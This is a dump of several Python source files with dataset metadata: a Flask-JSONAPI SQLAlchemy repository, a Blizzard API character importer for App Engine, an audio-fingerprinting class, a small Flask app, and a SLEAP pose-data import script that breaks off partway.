found.'.format(self.instance_name.capitalize(), id))\n except exc.SQLAlchemyError as error:\n logger.exception(error)\n raise ForbiddenError(detail='Error while getting {} details.'.format(self.instance_name))\n\n def delete(self, id):\n obj = self.get_detail(id)\n try:\n self.session.delete(obj)\n self.session.flush()\n except exc.SQLAlchemyError as error:\n logger.exception(error)\n raise ForbiddenError(detail='Error while deleting {}.'.format(self.instance_name))\n\n def update(self, data, **kwargs):\n id = data['id']\n obj = self.get_detail(id)\n for key, value in data.items():\n self.update_attribute(obj, key, value)\n try:\n self.session.flush()\n return obj\n except exc.SQLAlchemyError as error:\n logger.exception(error)\n raise ForbiddenError(detail='Error while updating {}.'.format(self.instance_name))\n\n def get_query(self):\n return self.model.query\n\n def apply_filters(self, query, filters):\n filters = filters or {}\n for filter, value in filters.items():\n if filter in self.filter_methods_map:\n filter_method = self.filter_methods_map[filter]\n query = query.filter(filter_method(value))\n else:\n query.filter_by(**{filter: value})\n return query\n\n def build(self, kwargs):\n return self.model(**kwargs)\n\n def update_attribute(self, obj, key, new_value):\n setattr(obj, key, new_value)\n", "sub_path": "flask_jsonapi/resource_repositories/sqlalchemy_repositories.py", "file_name": "sqlalchemy_repositories.py", "file_ext": "py", "file_size_in_byte": 3007, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "logging.getLogger", "line_number": 10, "usage_type": "call"}, {"api_name": "flask_jsonapi.resource_repositories.repositories.ResourceRepository", "line_number": 13, "usage_type": "attribute"}, {"api_name": "flask_jsonapi.resource_repositories.repositories", "line_number": 13, "usage_type": "name"}, {"api_name": "sqlalchemy.exc.SQLAlchemyError", "line_number": 25, "usage_type": "attribute"}, {"api_name": "sqlalchemy.exc", "line_number": 25, "usage_type": "name"}, {"api_name": "flask_jsonapi.exceptions.ForbiddenError", "line_number": 27, "usage_type": "call"}, {"api_name": "sqlalchemy.exc.SQLAlchemyError", "line_number": 33, "usage_type": "attribute"}, {"api_name": "sqlalchemy.exc", "line_number": 33, "usage_type": "name"}, {"api_name": "flask_jsonapi.exceptions.ForbiddenError", "line_number": 35, "usage_type": "call"}, {"api_name": "sqlalchemy.orm.exc.NoResultFound", "line_number": 40, "usage_type": "attribute"}, {"api_name": "sqlalchemy.orm.exc", "line_number": 40, "usage_type": "name"}, {"api_name": "flask_jsonapi.exceptions.ObjectNotFound", "line_number": 41, "usage_type": "call"}, {"api_name": "flask_jsonapi.exceptions", "line_number": 41, "usage_type": "name"}, {"api_name": "sqlalchemy.exc.SQLAlchemyError", "line_number": 43, "usage_type": "attribute"}, {"api_name": "sqlalchemy.exc", "line_number": 43, "usage_type": "name"}, {"api_name": "flask_jsonapi.exceptions.ForbiddenError", "line_number": 45, "usage_type": "call"}, {"api_name": "sqlalchemy.exc.SQLAlchemyError", "line_number": 52, "usage_type": "attribute"}, {"api_name": "sqlalchemy.exc", "line_number": 52, "usage_type": "name"}, {"api_name": "flask_jsonapi.exceptions.ForbiddenError", "line_number": 54, "usage_type": "call"}, {"api_name": "sqlalchemy.exc.SQLAlchemyError", "line_number": 64, "usage_type": "attribute"}, {"api_name": "sqlalchemy.exc", "line_number": 64, "usage_type": "name"}, {"api_name": "flask_jsonapi.exceptions.ForbiddenError", "line_number": 66, "usage_type": "call"}]} +{"seq_id": "564049448", "text": "# -*- coding: utf-8 -*-\n\n#!/usr/bin/env python\n\nimport json\nimport logging\nimport time\n\nfrom google.appengine.ext import ndb\nfrom google.appengine.api import urlfetch\nfrom google.appengine.api import urlfetch_errors\n\nclass APIKey(ndb.Model):\n key = ndb.StringProperty(indexed=True,required=True)\n\nclass Importer:\n\n def load(self, toonlist, data):\n q = APIKey.query()\n apikey = q.fetch()[0].key\n \n # Request all of the toon data from the blizzard API and determine the\n # group's ilvls, armor type counts and token type counts. subs are not\n # included in the counts, since they're not really part of the main\n # group.\n for toon in toonlist:\n try:\n # TODO: this object can probably be a class instead of another dict\n newdata = dict()\n data.append(newdata)\n\n url = 'https://us.api.battle.net/wow/character/aerie-peak/%s?fields=progression,items&locale=en_US&apikey=%s' % (toon, apikey)\n # create the rpc object for the fetch method. the deadline\n # defaults to 5 seconds, but that seems to be too short for the\n # Blizzard API site sometimes. setting it to 10 helps a little\n # but it makes page loads a little slower.\n rpc = urlfetch.create_rpc(10)\n rpc.callback = self.create_callback(rpc, toon, newdata)\n urlfetch.make_fetch_call(rpc, url)\n newdata['rpc'] = rpc\n newdata['toon'] = toon\n\n # The Blizzard API has a limit of 10 calls per second. Sleep here\n # for a very brief time to avoid hitting that limit.\n time.sleep(0.1)\n except:\n logging.error('Failed to create rpc for %s' % toon)\n\n # Now that all of the RPC calls have been created, loop through the data\n # dictionary one more time and wait for each fetch to be completed. Once\n # all of the waits finish, then we have all of the data from the\n # Blizzard API and can loop through all of it and build the page.\n start = time.time()\n for d in data:\n try:\n d['rpc'].wait()\n except:\n logging.error('Waiting for rpc failed')\n end = time.time()\n \n logging.info(\"Time spent retrieving data: %f seconds\" % (end-start))\n\n # Callback that handles the result of the call to the Blizzard API. This will fill in\n # the toondata dict for the requested toon with either data from Battle.net or with an\n # error message to display on the page.\n def handle_result(self, rpc, name, toondata):\n\n try:\n response = rpc.get_result()\n except urlfetch_errors.DeadlineExceededError:\n logging.error('urlfetch threw DeadlineExceededError on toon %s' % name.encode('ascii','ignore'))\n toondata['toon'] = name\n toondata['status'] = 'nok'\n toondata['reason'] = 'Timeout retrieving data from Battle.net for %s. Refresh page to try again.' % name\n return\n except urlfetch_errors.DownloadError:\n logging.error('urlfetch threw DownloadError on toon %s' % name.encode('ascii','ignore'))\n toondata['toon'] = name\n toondata['status'] = 'nok'\n toondata['reason'] = 'Network error retrieving data from Battle.net for toon %s. Refresh page to try again.' % name\n return\n except:\n logging.error('urlfetch threw unknown exception on toon %s' % name.encode('ascii','ignore'))\n toondata['toon'] = name\n toondata['status'] = 'nok'\n toondata['reason'] = 'Unknown error retrieving data from Battle.net for toon %s. Refresh page to try again.' % name\n return\n\n # change the json from the response into a dict of data and store it\n # into the toondata object that was passed in.\n jsondata = json.loads(response.content)\n toondata.update(jsondata);\n\n # Blizzard's API will return an error if it couldn't retrieve the data\n # for some reason. Check for this and log it if it fails. Note that\n # this response doesn't contain the toon's name so it has to be added\n # in afterwards.\n if 'status' in jsondata and jsondata['status'] == 'nok':\n logging.error('Blizzard API failed to find toon %s for reason: %s' %\n (name.encode('ascii','ignore'), jsondata['reason']))\n toondata['toon'] = name\n toondata['reason'] = \"Error retrieving data for %s from Blizzard API: %s\" % (name, jsondata['reason'])\n return\n\n # we get all of the data here, but we want to filter out just the raids\n # we care about so that it's not so much data returned from the importer\n validraids = ['Highmaul','Blackrock Foundry']\n if toondata['progression'] != None:\n toondata['progression']['raids'] = [r for r in toondata['progression']['raids'] if r['name'] in validraids]\n\n del toondata['rpc']\n\n def create_callback(self, rpc, name, toondata):\n return lambda: self.handle_result(rpc, name, toondata)\n\nclass Setup:\n\n # The new Battle.net Mashery API requires an API key when using it. This\n # method stores an API in the datastore so it can used in later page requests.\n def setkey(self,apikey):\n\n # Delete all of the entities out of the apikey datastore so fresh entities\n # can be loaded.\n q = APIKey.query()\n result = q.fetch();\n if (len(result) == 0):\n k = APIKey(key = apikey)\n k.put()\n else:\n k = result[0]\n k.key = apikey\n k.put()\n", "sub_path": "wowapi.py", "file_name": "wowapi.py", "file_ext": "py", "file_size_in_byte": 5784, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "google.appengine.ext.ndb.Model", "line_number": 13, "usage_type": "attribute"}, {"api_name": "google.appengine.ext.ndb", "line_number": 13, "usage_type": "name"}, {"api_name": "google.appengine.ext.ndb.StringProperty", "line_number": 14, "usage_type": "call"}, {"api_name": "google.appengine.ext.ndb", "line_number": 14, "usage_type": "name"}, {"api_name": "google.appengine.api.urlfetch.create_rpc", "line_number": 37, "usage_type": "call"}, {"api_name": "google.appengine.api.urlfetch", "line_number": 37, "usage_type": "name"}, {"api_name": "google.appengine.api.urlfetch.make_fetch_call", "line_number": 39, "usage_type": "call"}, {"api_name": "google.appengine.api.urlfetch", "line_number": 39, "usage_type": "name"}, {"api_name": "time.sleep", "line_number": 45, "usage_type": "call"}, {"api_name": "logging.error", "line_number": 47, "usage_type": "call"}, {"api_name": "time.time", "line_number": 53, "usage_type": "call"}, {"api_name": "logging.error", "line_number": 58, "usage_type": "call"}, {"api_name": "time.time", "line_number": 59, "usage_type": "call"}, {"api_name": "logging.info", "line_number": 61, "usage_type": "call"}, {"api_name": "google.appengine.api.urlfetch_errors.DeadlineExceededError", "line_number": 70, "usage_type": "attribute"}, {"api_name": "google.appengine.api.urlfetch_errors", "line_number": 70, "usage_type": "name"}, {"api_name": "logging.error", "line_number": 71, "usage_type": "call"}, {"api_name": "google.appengine.api.urlfetch_errors.DownloadError", "line_number": 76, "usage_type": "attribute"}, {"api_name": "google.appengine.api.urlfetch_errors", "line_number": 76, "usage_type": "name"}, {"api_name": "logging.error", "line_number": 77, "usage_type": "call"}, {"api_name": "logging.error", "line_number": 83, "usage_type": "call"}, {"api_name": "json.loads", "line_number": 91, "usage_type": "call"}, {"api_name": "logging.error", "line_number": 99, "usage_type": "call"}]} +{"seq_id": "20701006", "text": "import decoder as decoder\nimport fingerprint\nimport multiprocessing\nimport os\nimport traceback\nimport sys\nimport pandas as pd\nimport numpy as np\nimport itertools \n\n\nclass Dejavu(object):\n\n\tSONG_ID = \"song_id\"\n\tSONG_NAME = 'song_name'\n\tCONFIDENCE = 'confidence'\n\tMATCH_TIME = 'match_time'\n\tOFFSET = 'offset'\n\tOFFSET_SECS = 'offset_seconds'\n\n\tdef __init__(self):\n\t\tsuper(Dejavu, self).__init__()\n\n\t\tif not os.path.isfile('database/fingerprint_table.csv'):\n\t\t\tself.fingerprint_table = pd.DataFrame({'FIELD_HASH':pd.Series([]),\n\t\t\t\t\t 'FIELD_SONG_ID':pd.Series([]),\n\t\t\t\t\t 'FIELD_OFFSET':pd.Series([])})\n\t\telse:\n\t\t\tself.fingerprint_table = pd.read_csv('database/fingerprint_table.csv', encoding='utf-8')\n\n\t\t\t\n\t\tif not os.path.isfile('database/songs_table.csv'):\n\t\t\tself.songs_table = pd.DataFrame({'FIELD_SONGNAME':pd.Series([]),\n\t\t\t\t\t 'FIELD_FILE_SHA1':pd.Series([])})\n\t\telse:\n\t\t\tself.songs_table = pd.read_csv('database/songs_table.csv', encoding='utf-8')\n\t\tself.limit = None\n\t\tself.get_fingerprinted_songs()\n\n\tdef _fingerprint_worker(self, filename, limit=None, song_name=None):\n\t\t# Pool.imap sends arguments as tuples so we have to unpack\n\t\t# them ourself.\n\t\t\n\t\tsongname, extension = os.path.splitext(os.path.basename(filename))\n\t\tsong_name = song_name or songname\n\t\tchannels, Fs, file_hash = decoder.read(filename, limit)\n\t\tresult = set()\n\t\tchannel_amount = len(channels)\n\n\t\tfor channeln, channel in enumerate(channels):\n\t\t\t# TODO: Remove prints or change them into optional logging.\n\t\t\tprint(\"Fingerprinting channel %d/%d for %s\" % (channeln + 1,\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t channel_amount,\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t filename))\n\t\t\thashes = fingerprint.fingerprint(channel, Fs=Fs)\n\t\t\tprint(\"Finished channel %d/%d for %s\" % (channeln + 1, \\\n\t\t\t\t\t\t\t\t\t\t\t\tchannel_amount, filename))\n\t\t\tresult |= set(hashes)\n\t\tsid = self.insert_song(song_name, file_hash)\n\t\t# add song data to songs dataframe\n\t\tself.insert_hashes(sid, list(result))\n\t\t# add fingerprints of the song to fingerprints dataframe\n\t\tself.get_fingerprinted_songs()\n\t\tprint('Song added to database')\n\n\tdef fingerprint_directory(self, path, extensions, nprocesses=2):\n\t\t# Try to use the maximum amount of processes if not given.\n\t\tfilenames_to_fingerprint = []\n\t\tfor filename, _ in decoder.find_files(path, extensions):\n\n\t\t\t# don't refingerprint already fingerprinted files\n\t\t\tif decoder.unique_hash(filename) in self.songhashes_set:\n\t\t\t\tprint (\"%s already fingerprinted, continuing...\" % filename)\n\t\t\t\tcontinue\n\n\t\t\tfilenames_to_fingerprint.append(filename)\n\n\t\t# pool = multiprocessing.Pool(nprocesses)\n\t\t# pool.map(self._fingerprint_worker, filenames_to_fingerprint)\n\n\t\tfor filename_to_fingerprint in filenames_to_fingerprint:\n\t\t\tself._fingerprint_worker(filename_to_fingerprint)\n\t\tprint(\"Done with fingerprinting\")\n\t\t\n\tdef find_matches(self, samples, Fs=fingerprint.DEFAULT_FS):\n\t\thashes = fingerprint.fingerprint(samples, Fs=Fs)\n\t\treturn self.return_matches(hashes)\n\n\tdef align_matches(self, matches):\n\t\t\"\"\"\n\t\t\tFinds hash matches that align in time with other matches and finds\n\t\t\tconsensus about which hashes are \"true\" signal from the audio.\n\n\t\t\tReturns a dictionary with match information.\n\t\t\"\"\"\n\t\t# align by diffs\n\t\tdiff_counter = {}\n\t\tlargest = 0\n\t\tlargest_count = 0\n\t\tsong_id = -1\n\n\t\tfor tup in matches:\n\t\t\tsid, diff = tup\n\t\t\tif diff not in diff_counter:\n\t\t\t\tdiff_counter[diff] = {}\n\t\t\tif sid not in diff_counter[diff]:\n\t\t\t\tdiff_counter[diff][sid] = 0\n\t\t\tdiff_counter[diff][sid] += 1\n\n\t\t\tif diff_counter[diff][sid] > largest_count:\n\t\t\t\tlargest = diff\n\t\t\t\tlargest_count = diff_counter[diff][sid]\n\t\t\t\tsong_id = sid\n\t\t\n\t\tmatching_list = []\n\t\tfor key1 in diff_counter.keys():\n\t\t\tfor key2 in diff_counter[key1].keys():\n\t\t\t\tmatching_list.append((diff_counter[key1][key2], key1, key2))\n\t\tmatching_list = list(sorted(matching_list, reverse=True))[:16]\n\n\t\tmatching_df = pd.DataFrame(columns = ['SONG_ID', 'SONG_NAME', 'CONFIDENCE', 'OFFSET', 'OFFSET_SECS', 'FIELD_FILE_SHA1'])\n\t\t# extract idenfication\n\t\tfor count, diff, song_id in matching_list:\n\n\t\t\tsong = self.get_song_by_id(song_id)\t\t\t\n\t\t\tsongname = song[0] if song else None\n\n\t\t\t# return match info\n\t\t\tnseconds = round(float(diff) / fingerprint.DEFAULT_FS *\n\t\t\t\t\t\t\t fingerprint.DEFAULT_WINDOW_SIZE *\n\t\t\t\t\t\t\t fingerprint.DEFAULT_OVERLAP_RATIO, 5)\n\t\t\tsong = {\n\t\t\t\t'SONG_ID' : song_id,\n\t\t\t\t'SONG_NAME' : song[1],\n\t\t\t\t'CONFIDENCE' : count,\n\t\t\t\t'OFFSET' : int(diff),\n\t\t\t\t'OFFSET_SECS' : nseconds,\n\t\t\t\t'FIELD_FILE_SHA1' : song[0],\n\t\t\t\t\t}\n\t\t\t\n\t\t\tdf = pd.DataFrame([song], columns = song.keys())\n\t\t\tmatching_df = pd.concat([matching_df, df], axis = 0, ignore_index=True).reset_index(drop=True)\n\n\t\t\t# for key in song.keys():\n\t\t\t# \tprint(key, ':', song[key])\n\n\t\tprint(matching_df)\n\n\t\treturn \n\t\n\tdef recognize(self, recognizer, *options, **kwoptions):\n\t\tr = recognizer(self)\n\t\treturn r.recognize(*options, **kwoptions)\n\n\tdef get_fingerprinted_songs(self):\n\t\t# get songs previously indexed\n\t\tself.songs = self.get_songs()\n\t\tself.songhashes_set = set() # to know which ones we've computed before\n\t\tfor index, song in self.songs.iterrows():\n\t\t\tsong_hash = song['FIELD_FILE_SHA1']\n\t\t\tself.songhashes_set.add(song_hash)\n\n\tdef get_songs(self):\n\t\t\"\"\"\n\t\tReturns all fully fingerprinted songs in the database.\n\t\t\"\"\"\n\t\treturn self.songs_table\n\t\t\n\tdef insert_song(self, song_name, file_hash):\n\t\t\"\"\"\n\t\tInserts a song name into the database, returns the new\n\t\tidentifier of the song.\n\n\t\tsong_name: The name of the song.\n\t\t\"\"\"\n\t\tself.songs_table = self.songs_table.append(pd.DataFrame([[song_name, file_hash \\\n\t\t\t\t\t\t\t\t\t\t]],columns=['FIELD_SONGNAME', \\\n\t\t\t\t\t\t\t\t\t\t\t'FIELD_FILE_SHA1']),\\\n\t\t\t\t\t\t\t\t\t\t\t\tignore_index=True)\n\t\tself.songs_table.to_csv('database/songs_table.csv',encoding='utf-8',index=False)\n\t\treturn (len(self.songs_table)-1)\n\n\tdef insert_hashes(self, sid, hashes):\n\t\t\"\"\"\n\t\tInsert a multitude of fingerprints.\n\n\t\t sid: Song identifier the fingerprints belong to\n\t\thashes: A sequence of tuples in the format (hash, offset)\n\t\t- hash: Part of a sha1 hash, in hexadecimal format\n\t\t- offset: Offset this hash was created from/at.\n\t\t\"\"\"\n\t\tvalues = []\n\t\tfor hash1, offset in hashes:\n\t\t\tvalues.append((hash1, sid, offset))\n\t\thash_table = pd.DataFrame(values,columns=['FIELD_HASH', 'FIELD_SONG_ID', 'FIELD_OFFSET'])\n\t\thash_table.to_csv('database/{}.csv'.format(sid),encoding='utf-8',index=False)\n\t\t# self.fingerprint_table = self.fingerprint_table.append(hash_table,ignore_index=True)\n\n\tdef merge_tables(self):\n\t\t\"\"\"\n\t\tMerge all the CSVs.\n\t\t\"\"\"\n\t\tself.fingerprint_table = pd.read_csv('database/0.csv',encoding='utf-8') \n\t\tfor i in range(1, len(self.songs_table)):\n\t\t\thash_table = pd.read_csv('database/{}.csv'.format(i),encoding='utf-8') \n\t\t\tself.fingerprint_table = self.fingerprint_table.append(hash_table,ignore_index=True)\n\t\tself.fingerprint_table.to_csv('database/fingerprint_table.csv',encoding='utf-8',index=False)\n\n\tdef set_song_fingerprinted(self, sid):\n\t\t\"\"\"\n\t\tSets a specific song as having all fingerprints in the database.\n\n\t\tsid: Song identifier\n\t\t\"\"\"\n\t\tself.songs_table.loc[sid] = list(self.songs_table.loc[sid])[:-1]+[1]\n\t\n\tdef get_song_by_id(self, sid):\n\t\t\"\"\"\n\t\tReturn a song by its identifier\n\n\t\tsid: Song identifier\n\t\t\"\"\"\n\t\treturn list(self.songs_table.loc[sid])\n\t\n\tdef return_matches(self, hashes):\n\t\t\"\"\"\n\t\tSearches the database for pairs of (hash, offset) values.\n\n\t\thashes: A sequence of tuples in the format (hash, offset)\n\t\t- hash: Part of a sha1 hash, in hexadecimal format\n\t\t- offset: Offset this hash was created from/at.\n\n\t\tReturns a sequence of (sid, offset_difference) tuples.\n\n\t\t\t\t\t sid: Song identifier\n\t\toffset_difference: (offset - database_offset)\n\t\t\"\"\"\n\t\t# Create a dictionary of hash => offset pairs for later lookups\n\t\tmapper = {}\n\t\tfor hash_val, offset in hashes:\n\t\t\tmapper[hash_val] = offset\n\t\tmatches=[]\n\t\t# Get an iteratable of all the hashes we need\n\t\tvalues = list(mapper.keys())\n\t\t# Create our IN part of the query\n\t\tvalues = pd.DataFrame({'FIELD_HASH':pd.Series(values)})\n\t\tnew = self.fingerprint_table.merge(values, how = 'inner', on = ['FIELD_HASH'])\n\n\t\tfor index, row in new.iterrows():\n\t\t\thash1, sid, offset = row\n\t\t\tmatches.append((sid, offset - mapper[hash1]))\n\t\treturn matches\n\ndef grouper(iterable, n, fillvalue=None):\n\targs = [iter(iterable)] * n\n\treturn (filter(None, values) for values\n\t\t\tin itertools.zip_longest(fillvalue=fillvalue, *args))\n\ndef chunkify(lst, n):\n\t\"\"\"\n\tSplits a list into roughly n equal parts.\n\thttp://stackoverflow.com/questions/2130016/splitting-a\n\t-list-of-arbitrary-size-into-only-roughly-n-equal-parts\n\t\"\"\"\n\treturn [lst[i::n] for i in range(n)]\n", "sub_path": "dejavu.py", "file_name": "dejavu.py", "file_ext": "py", "file_size_in_byte": 8503, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "os.path.isfile", "line_number": 24, "usage_type": "call"}, {"api_name": "os.path", "line_number": 24, "usage_type": "attribute"}, {"api_name": "pandas.DataFrame", "line_number": 25, "usage_type": "call"}, {"api_name": "pandas.Series", "line_number": 25, "usage_type": "call"}, {"api_name": "pandas.Series", "line_number": 26, "usage_type": "call"}, {"api_name": "pandas.Series", "line_number": 27, "usage_type": "call"}, {"api_name": "pandas.read_csv", "line_number": 29, "usage_type": "call"}, {"api_name": "os.path.isfile", "line_number": 32, "usage_type": "call"}, {"api_name": "os.path", "line_number": 32, "usage_type": "attribute"}, {"api_name": "pandas.DataFrame", "line_number": 33, "usage_type": "call"}, {"api_name": "pandas.Series", "line_number": 33, "usage_type": "call"}, {"api_name": "pandas.Series", "line_number": 34, "usage_type": "call"}, {"api_name": "pandas.read_csv", "line_number": 36, "usage_type": "call"}, {"api_name": "os.path.splitext", "line_number": 44, "usage_type": "call"}, {"api_name": "os.path", "line_number": 44, "usage_type": "attribute"}, {"api_name": "os.path.basename", "line_number": 44, "usage_type": "call"}, {"api_name": "decoder.read", "line_number": 46, "usage_type": "call"}, {"api_name": "fingerprint.fingerprint", "line_number": 55, "usage_type": "call"}, {"api_name": "decoder.find_files", "line_number": 69, "usage_type": "call"}, {"api_name": "decoder.unique_hash", "line_number": 72, "usage_type": "call"}, {"api_name": "fingerprint.DEFAULT_FS", "line_number": 85, "usage_type": "attribute"}, {"api_name": "fingerprint.fingerprint", "line_number": 86, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 121, "usage_type": "call"}, {"api_name": "fingerprint.DEFAULT_FS", "line_number": 129, "usage_type": "attribute"}, {"api_name": "fingerprint.DEFAULT_WINDOW_SIZE", "line_number": 130, "usage_type": "attribute"}, {"api_name": "fingerprint.DEFAULT_OVERLAP_RATIO", "line_number": 131, "usage_type": "attribute"}, {"api_name": "pandas.DataFrame", "line_number": 141, "usage_type": "call"}, {"api_name": "pandas.concat", "line_number": 142, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 176, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 195, "usage_type": "call"}, {"api_name": "pandas.read_csv", "line_number": 203, "usage_type": "call"}, {"api_name": "pandas.read_csv", "line_number": 205, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 246, "usage_type": "call"}, {"api_name": "pandas.Series", "line_number": 246, "usage_type": "call"}, {"api_name": "itertools.zip_longest", "line_number": 257, "usage_type": "call"}]} +{"seq_id": "109891780", "text": "import socket\nimport time\nfrom flask import Flask\n\napplication = Flask(__name__)\n\n@application.route(\"/\")\ndef hello():\n \n file = open('/mnt/hello-world-storage/logfile','r+')\n file.write(\"access from: \"+socket.gethostname()+\" at: \"+time.ctime())\n \n return \"Hello World! Greetings from \" + socket.gethostname() + \"\\n\" + str(file.readlines()) + \"\\n\"\n\n file.close()\n \nif __name__ == \"__main__\":\n application.run()\n", "sub_path": "wsgi.py", "file_name": "wsgi.py", "file_ext": "py", "file_size_in_byte": 435, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "flask.Flask", "line_number": 5, "usage_type": "call"}, {"api_name": "socket.gethostname", "line_number": 11, "usage_type": "call"}, {"api_name": "time.ctime", "line_number": 11, "usage_type": "call"}, {"api_name": "socket.gethostname", "line_number": 13, "usage_type": "call"}]} +{"seq_id": "586310129", "text": "import h5py\r\nimport pandas as pd\r\nimport json\r\nimport cv2\r\nimport os, glob\r\nfrom pylab import *\r\nimport numpy as np\r\nimport operator\r\nfrom functools import reduce\r\nfrom configparser import ConfigParser, MissingSectionHeaderError, NoOptionError\r\nimport errno\r\nimport simba.rw_dfs\r\n\r\n\r\n#def importSLEAPbottomUP(inifile, dataFolder, currIDList):\r\n\r\ndata_folder = r'Z:\\DeepLabCut\\DLC_extract\\Troubleshooting\\Sleap_h5\\import_folder'\r\n\r\nconfigFile = str(r\"Z:\\DeepLabCut\\DLC_extract\\Troubleshooting\\Sleap_h5\\project_folder\\project_config.ini\")\r\nconfig = ConfigParser()\r\ntry:\r\n config.read(configFile)\r\nexcept MissingSectionHeaderError:\r\n print('ERROR: Not a valid project_config file. Please check the project_config.ini path.')\r\nprojectPath = config.get('General settings', 'project_path')\r\nanimalIDs = config.get('Multi animal IDs', 'id_list')\r\ncurrIDList = animalIDs.split(\",\")\r\ncurrIDList = [x.strip(' ') for x in currIDList]\r\nfilesFound = glob.glob(data_folder + '/*.analysis.h5')\r\nvideoFolder = os.path.join(projectPath, 'videos')\r\noutputDfFolder = os.path.join(projectPath, 'csv', 'input_csv')\r\ntry:\r\n wfileType = config.get('General settings', 'workflow_file_type')\r\nexcept NoOptionError:\r\n wfileType = 'csv'\r\nanimalsNo = len(currIDList)\r\nbpNamesCSVPath = os.path.join(projectPath, 'logs', 'measures', 'pose_configs', 'bp_names', 'project_bp_names.csv')\r\nposeEstimationSetting = config.get('create ensemble settings', 'pose_estimation_body_parts')\r\nprint('Converting sleap h5 into dataframes...')\r\ncsvPaths = []\r\n\r\nfor filename in filesFound:\r\n video_save_name = os.path.basename(filename).replace('analysis.h5', wfileType)\r\n savePath = os.path.join(outputDfFolder, video_save_name)\r\n bpNames, orderVarList, OrderedBpList, MultiIndexCol, dfHeader, csvFilesFound, xy_heads, bp_cord_names, bpNameList, projBpNameList = [], [], [], [], [], [], [], [], [], []\r\n print('Processing ' + str(os.path.basename(filename)) + '...')\r\n hf = h5py.File(filename, 'r')\r\n bp_name_list, track_list, = [], [],\r\n for bp in hf.get('node_names'): bp_name_list.append(bp.decode('UTF-8'))\r\n for track in hf.get('track_names'): track_list.append(track.decode('UTF-8'))\r\n track_occupancy = hf.get('track_occupancy')\r\n with track_occupancy.astype('int16'):\r\n track_occupancy = track_occupancy[:]\r\n tracks = hf.get('tracks')\r\n with tracks.astype('int16'):\r\n tracks = tracks[:]\r\n frames = tracks.shape[3]\r\n\r\n animal_df_list = []\r\n for animals in range(len(track_list)):\r\n animal_x_array, animal_y_array = np.transpose(tracks[animals][0]), np.transpose(tracks[animals][1])\r\n animal_p_array = np.zeros(animal_x_array.shape)\r\n animal_array = np.ravel([animal_x_array, animal_y_array, animal_p_array], order=\"F\").reshape(frames, len(bp_name_list) * 3)\r\n animal_df_list.append(pd.DataFrame(animal_array))\r\n video_df = pd.concat(animal_df_list, axis=1)\r\n\r\n for animal in range(len(currIDList)):\r\n for bp in bp_name_list:\r\n colName1, colName2, colName3 = str('Animal_' + str(animal+1) + '_' + bp + '_x'), ('Animal_' + str(animal+1) + '_' + bp + '_y'), ('Animal_' + str(animal+1) + '_' + bp + '_p')\r\n xy_heads.extend((colName1, colName2))\r\n bp_cord_names.append('_' + bp + '_x')\r\n bp_cord_names.append('_' + bp + '_y')\r\n bpNameList.extend((colName1, colName2, colName3))\r\n dfHeader.extend((colName1, colName2, colName3))\r\n if poseEstimationSetting == 'user_defined':\r\n config.set(\"General settings\", \"animal_no\", str(animalsNo))\r\n with open(configFile, \"w+\") as f:\r\n config.write(f)\r\n f.close()\r\n\r\n bpNameListGrouped = [tuple(bpNameList[i:i + 3]) for i in range(0, len(bpNameList), 3)]\r\n\r\n video_df.columns = dfHeader\r\n video_df.fillna(0, inplace=True)\r\n simba.rw_dfs.save_df(video_df, wfileType, savePath)\r\n csvPaths.append(savePath)\r\n print('Saved file ' + savePath + '...')\r\n\r\n\r\n###### ASSIGN IDENTITIES\r\nglobal currIDcounter\r\ndef define_ID(event, x, y, flags, param):\r\n global currIDcounter\r\n if (event == cv2.EVENT_LBUTTONDBLCLK):\r\n centerX, centerY, currID = (int(x), int(y), currIDList[currIDcounter])\r\n ID_user_cords.append([centerX, centerY, currIDList[currIDcounter]])\r\n cv2.putText(overlay, str(currID), (centerX, centerY), cv2.FONT_HERSHEY_SIMPLEX, fontScale, (0, 255, 0), 5)\r\n currIDcounter += 1\r\n\r\ncmap, colorList = cm.get_cmap(str('tab10'), animalsNo + 1), []\r\nfor i in range(cmap.N):\r\n rgb = list((cmap(i)[:3]))\r\n rgb = [i * 255 for i in rgb]\r\n rgb.reverse()\r\n colorList.append(rgb)\r\n\r\nfor csvFile in csvPaths:\r\n indBpCordList, frameNumber, addSpacer, EuclidDistanceList, changeList = [], 0, 2, [], []\r\n ID_user_cords, currIDcounter = [], 0\r\n assigningIDs, completePromt, chooseFrame, assignBpCords = False, False, True, True\r\n currDf = simba.rw_dfs.read_df(csvFile, wfileType)\r\n vidFname = os.path.join(videoFolder, os.path.basename(csvFile).replace('.csv', '.mp4'))\r\n vidBasename = os.path.basename(vidFname)\r\n if not os.path.exists(vidFname):\r\n raise FileNotFoundError(errno.ENOENT, os.strerror(errno.ENOENT), vidFname)\r\n cap = cv2.VideoCapture(vidFname)\r\n if not cap.isOpened():\r\n raise Exception('Con\\'t open video file ' + vidFname)\r\n width, height = int(cap.get(cv2.CAP_PROP_FRAME_WIDTH)), int(cap.get(cv2.CAP_PROP_FRAME_HEIGHT))\r\n mySpaceScale, myRadius, myResolution, myFontScale = 40, 10, 1500, 1.2\r\n maxResDimension = max(width, height)\r\n circleScale, fontScale, spacingScale = int(myRadius / (myResolution / maxResDimension)), float(myFontScale / (myResolution / maxResDimension)), int(mySpaceScale / (myResolution / maxResDimension))\r\n cv2.namedWindow('Define animal IDs', cv2.WINDOW_NORMAL)\r\n\r\n while (1):\r\n if (chooseFrame == True) and (assignBpCords == True):\r\n cv2.namedWindow('Define animal IDs', cv2.WINDOW_NORMAL)\r\n cap.set(1, frameNumber)\r\n ret, frame = cap.read()\r\n if not ret:\r\n raise Exception('Can\\'t read video file ' + vidFname)\r\n overlay = frame.copy()\r\n for animal_bps in range(len(bpNameListGrouped)):\r\n currCols = bpNameListGrouped[animal_bps]\r\n currcolor = tuple(colorList[animal_bps])\r\n x_cord = currDf.at[frameNumber, currCols[0]]\r\n y_cord = currDf.at[frameNumber, currCols[1]]\r\n 